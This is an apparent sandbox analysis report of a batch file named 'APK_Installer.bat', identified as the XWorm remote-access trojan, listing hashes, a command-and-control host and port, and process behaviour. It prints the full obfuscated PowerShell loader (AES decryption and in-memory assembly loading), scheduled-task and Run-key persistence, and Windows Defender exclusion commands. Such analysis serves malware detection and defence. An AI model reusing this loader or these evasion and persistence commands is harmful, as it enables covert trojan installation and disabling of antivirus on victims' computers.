Analysis
-
max time kernel
64s -
max time network
27s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
31-05-2024 11:42
Static task
static1
Behavioral task
behavioral1
Sample
APK_Installer.bat
Resource
win11-20240426-en
General
-
Target
APK_Installer.bat
-
Size
302KB
-
MD5
7a5f5944302b8298714b56ae2f138b7c
-
SHA1
669b42f2f6e76895899d84d5ad7a12f23d951f13
-
SHA256
3f5e7ecf09b373256a2765700ae45c9edc070a1699893a3fd11af4cda4683552
-
SHA512
73049c86a87fe41797a4f3b382e0f2740a9def19ee12979d7a37237b33fa5aa3ad2ec1c4852ebc02987afa75f08fd52115d4a416eabf38b5df1936ce38b8f120
-
SSDEEP
6144:32i9XCwjujllYECVvYOjntEw8ZNsT0oilQHSzlO8DF8hVvRj:32iBCwyhCVlaJZUilQHulOq2vRj
Malware Config
Extracted
xworm
19.ip.gl.ply.gg:38173
-
Install_directory
%Userprofile%
-
install_file
Runtime Broker.exe
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/1700-48-0x0000022F2ACA0000-0x0000022F2ACBA000-memory.dmp family_xworm -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4196 powershell.exe 1700 powershell.exe 3560 powershell.exe 4336 powershell.exe 2696 powershell.exe 1812 powershell.exe 1852 powershell.exe -
Drops startup file 2 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
Runtime Broker.exepid process 1532 Runtime Broker.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Windows\CurrentVersion\Run\Runtime Broker = "C:\\Users\\Admin\\Runtime Broker.exe" powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 16 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeRuntime Broker.exepid process 3560 powershell.exe 3560 powershell.exe 4196 powershell.exe 4196 powershell.exe 1700 powershell.exe 1700 powershell.exe 1812 powershell.exe 1812 powershell.exe 1852 powershell.exe 1852 powershell.exe 4336 powershell.exe 4336 powershell.exe 2696 powershell.exe 2696 powershell.exe 1700 powershell.exe 1532 Runtime Broker.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3560 powershell.exe Token: SeDebugPrivilege 4196 powershell.exe Token: SeIncreaseQuotaPrivilege 4196 powershell.exe Token: SeSecurityPrivilege 4196 powershell.exe Token: SeTakeOwnershipPrivilege 4196 powershell.exe Token: SeLoadDriverPrivilege 4196 powershell.exe Token: SeSystemProfilePrivilege 4196 powershell.exe Token: SeSystemtimePrivilege 4196 powershell.exe Token: SeProfSingleProcessPrivilege 4196 powershell.exe Token: SeIncBasePriorityPrivilege 4196 powershell.exe Token: SeCreatePagefilePrivilege 4196 powershell.exe Token: SeBackupPrivilege 4196 powershell.exe Token: SeRestorePrivilege 4196 powershell.exe Token: SeShutdownPrivilege 4196 powershell.exe Token: SeDebugPrivilege 4196 powershell.exe Token: SeSystemEnvironmentPrivilege 4196 powershell.exe Token: SeRemoteShutdownPrivilege 4196 powershell.exe Token: SeUndockPrivilege 4196 powershell.exe Token: SeManageVolumePrivilege 4196 powershell.exe Token: 33 4196 powershell.exe Token: 34 4196 powershell.exe Token: 35 4196 powershell.exe Token: 36 4196 powershell.exe Token: SeIncreaseQuotaPrivilege 4196 powershell.exe Token: SeSecurityPrivilege 4196 powershell.exe Token: SeTakeOwnershipPrivilege 4196 powershell.exe Token: SeLoadDriverPrivilege 4196 powershell.exe Token: SeSystemProfilePrivilege 4196 powershell.exe Token: SeSystemtimePrivilege 4196 powershell.exe Token: SeProfSingleProcessPrivilege 4196 powershell.exe Token: SeIncBasePriorityPrivilege 4196 powershell.exe Token: SeCreatePagefilePrivilege 4196 powershell.exe Token: SeBackupPrivilege 4196 powershell.exe Token: SeRestorePrivilege 4196 powershell.exe Token: SeShutdownPrivilege 4196 powershell.exe Token: SeDebugPrivilege 4196 powershell.exe Token: SeSystemEnvironmentPrivilege 4196 powershell.exe Token: SeRemoteShutdownPrivilege 4196 powershell.exe Token: SeUndockPrivilege 4196 powershell.exe Token: SeManageVolumePrivilege 4196 powershell.exe Token: 33 4196 powershell.exe Token: 34 4196 powershell.exe Token: 35 4196 powershell.exe Token: 36 4196 powershell.exe Token: SeIncreaseQuotaPrivilege 4196 powershell.exe Token: SeSecurityPrivilege 4196 powershell.exe Token: SeTakeOwnershipPrivilege 4196 powershell.exe Token: SeLoadDriverPrivilege 4196 powershell.exe Token: SeSystemProfilePrivilege 4196 powershell.exe Token: SeSystemtimePrivilege 4196 powershell.exe Token: SeProfSingleProcessPrivilege 4196 powershell.exe Token: SeIncBasePriorityPrivilege 4196 powershell.exe Token: SeCreatePagefilePrivilege 4196 powershell.exe Token: SeBackupPrivilege 4196 powershell.exe Token: SeRestorePrivilege 4196 powershell.exe Token: SeShutdownPrivilege 4196 powershell.exe Token: SeDebugPrivilege 4196 powershell.exe Token: SeSystemEnvironmentPrivilege 4196 powershell.exe Token: SeRemoteShutdownPrivilege 4196 powershell.exe Token: SeUndockPrivilege 4196 powershell.exe Token: SeManageVolumePrivilege 4196 powershell.exe Token: 33 4196 powershell.exe Token: 34 4196 powershell.exe Token: 35 4196 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exepid process 1700 powershell.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exedescription pid process target process PID 3504 wrote to memory of 3560 3504 cmd.exe powershell.exe PID 3504 wrote to memory of 3560 3504 cmd.exe powershell.exe PID 3560 wrote to memory of 4196 3560 powershell.exe powershell.exe PID 3560 wrote to memory of 4196 3560 powershell.exe powershell.exe PID 3560 wrote to memory of 1344 3560 powershell.exe WScript.exe PID 3560 wrote to memory of 1344 3560 powershell.exe WScript.exe PID 1344 wrote to memory of 236 1344 WScript.exe cmd.exe PID 1344 wrote to memory of 236 1344 WScript.exe cmd.exe PID 236 wrote to memory of 1700 236 cmd.exe powershell.exe PID 236 wrote to memory of 1700 236 cmd.exe powershell.exe PID 1700 wrote to memory of 1812 1700 powershell.exe powershell.exe PID 1700 wrote to memory of 1812 1700 powershell.exe powershell.exe PID 1700 wrote to memory of 1852 1700 powershell.exe powershell.exe PID 1700 wrote to memory of 1852 1700 powershell.exe powershell.exe PID 1700 wrote to memory of 4336 1700 powershell.exe powershell.exe PID 1700 wrote to memory of 4336 1700 powershell.exe powershell.exe PID 1700 wrote to memory of 2696 1700 powershell.exe powershell.exe PID 1700 wrote to memory of 2696 1700 powershell.exe powershell.exe PID 1700 wrote to memory of 3464 1700 powershell.exe schtasks.exe PID 1700 wrote to memory of 3464 1700 powershell.exe schtasks.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\APK_Installer.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3504 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtEG91HadDOug1ikw4ED5Ft1+v0q/aQ1W+w0T1fq7bU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dK/r26SLdFIerecbjeR5Zw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sRhXB=New-Object System.IO.MemoryStream(,$param_var); $WaKyX=New-Object System.IO.MemoryStream; $KkhnQ=New-Object System.IO.Compression.GZipStream($sRhXB, [IO.Compression.CompressionMode]::Decompress); $KkhnQ.CopyTo($WaKyX); $KkhnQ.Dispose(); $sRhXB.Dispose(); $WaKyX.Dispose(); $WaKyX.ToArray();}function execute_function($param_var,$param2_var){ $HiXkA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GEGne=$HiXkA.EntryPoint; $GEGne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\APK_Installer.bat';$gMRjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\APK_Installer.bat').Split([Environment]::NewLine);foreach ($wPRor in $gMRjN) { if ($wPRor.StartsWith(':: ')) { $MmaAY=$wPRor.Substring(3); break; }}$payloads_var=[string[]]$MmaAY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3560 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_537_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_537.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4196
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_537.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:1344 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_537.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:236 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtEG91HadDOug1ikw4ED5Ft1+v0q/aQ1W+w0T1fq7bU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dK/r26SLdFIerecbjeR5Zw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sRhXB=New-Object System.IO.MemoryStream(,$param_var); $WaKyX=New-Object System.IO.MemoryStream; $KkhnQ=New-Object System.IO.Compression.GZipStream($sRhXB, [IO.Compression.CompressionMode]::Decompress); $KkhnQ.CopyTo($WaKyX); $KkhnQ.Dispose(); $sRhXB.Dispose(); $WaKyX.Dispose(); $WaKyX.ToArray();}function execute_function($param_var,$param2_var){ $HiXkA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GEGne=$HiXkA.EntryPoint; $GEGne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_537.bat';$gMRjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_537.bat').Split([Environment]::NewLine);foreach ($wPRor in $gMRjN) { if ($wPRor.StartsWith(':: ')) { $MmaAY=$wPRor.Substring(3); break; }}$payloads_var=[string[]]$MmaAY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1812
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1852
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Runtime Broker.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4336
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2696
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Admin\Runtime Broker.exe"6⤵
- Creates scheduled task(s)
PID:3464
-
-
-
-
-
-
C:\Users\Admin\Runtime Broker.exe"C:\Users\Admin\Runtime Broker.exe"1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1532
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5df472dcddb36aa24247f8c8d8a517bd7
SHA16f54967355e507294cbc86662a6fbeedac9d7030
SHA256e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA51206383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
-
Filesize
1KB
MD54ca42e9cc6de90060a4503debda3ea58
SHA1652f325e5c423876d85ba1a164301ab2d147604b
SHA25667b7e0001e15e60f1e5c92ce49644ce08500a099fd94135d179b8dfe0513567c
SHA51238303f1959a2fe056c3cdba1fc775538c21b20364c25154d9f8ca365f3abf8a240b3d3851b8854ddf33a994ae0ef55b6fdaafe695eef658a2386f0c8e05b1e10
-
Filesize
944B
MD5d0a4a3b9a52b8fe3b019f6cd0ef3dad6
SHA1fed70ce7834c3b97edbd078eccda1e5effa527cd
SHA25621942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31
SHA5121a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b
-
Filesize
944B
MD555f30089624be31af328ba4e012ae45a
SHA1121c28de7a5afe828ea395d94be8f5273817b678
SHA25628e49da06bd64f06a4cf1a9caead354b94b4d11d5dc916a92da0ed96bad00473
SHA512ef13cc5b22c754c7816e08b421de64bc8df527d7166e970454139410b2d381b53ebf288ec73013cdce92f0ac226d9ed5b342341db52a8cb0b85b5ad4d3090787
-
Filesize
944B
MD5050567a067ffea4eb40fe2eefebdc1ee
SHA16e1fb2c7a7976e0724c532449e97722787a00fec
SHA2563952d5b543e5cb0cb84014f4ad9f5f1b7166f592d28640cbc3d914d0e6f41d2e
SHA512341ad71ef7e850b10e229666312e4bca87a0ed9fe25ba4b0ab65661d5a0efa855db0592153106da07134d8fc2c6c0e44709bf38183c9a574a1fa543189971259
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
302KB
MD57a5f5944302b8298714b56ae2f138b7c
SHA1669b42f2f6e76895899d84d5ad7a12f23d951f13
SHA2563f5e7ecf09b373256a2765700ae45c9edc070a1699893a3fd11af4cda4683552
SHA51273049c86a87fe41797a4f3b382e0f2740a9def19ee12979d7a37237b33fa5aa3ad2ec1c4852ebc02987afa75f08fd52115d4a416eabf38b5df1936ce38b8f120
-
Filesize
115B
MD5cf76d7d4f3509d144f37f698c25d3a32
SHA11e57c060cd8040da76dfcd3d5f84ef934b373595
SHA25677312a7113a0b5dce2e41645aefb71038809e6c126369ed079f5da4af14aa250
SHA5122d35bab8f17a14d6c7a410eabf418966a9aefb6c6e98de10840bd8a8ddf7d32df4a09328386f232ebb0aea30b096b86148e981cb516e1fb408f7ffc6e4ecbe5b
-
Filesize
440KB
MD50e9ccd796e251916133392539572a374
SHA1eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
SHA256c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
SHA512e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d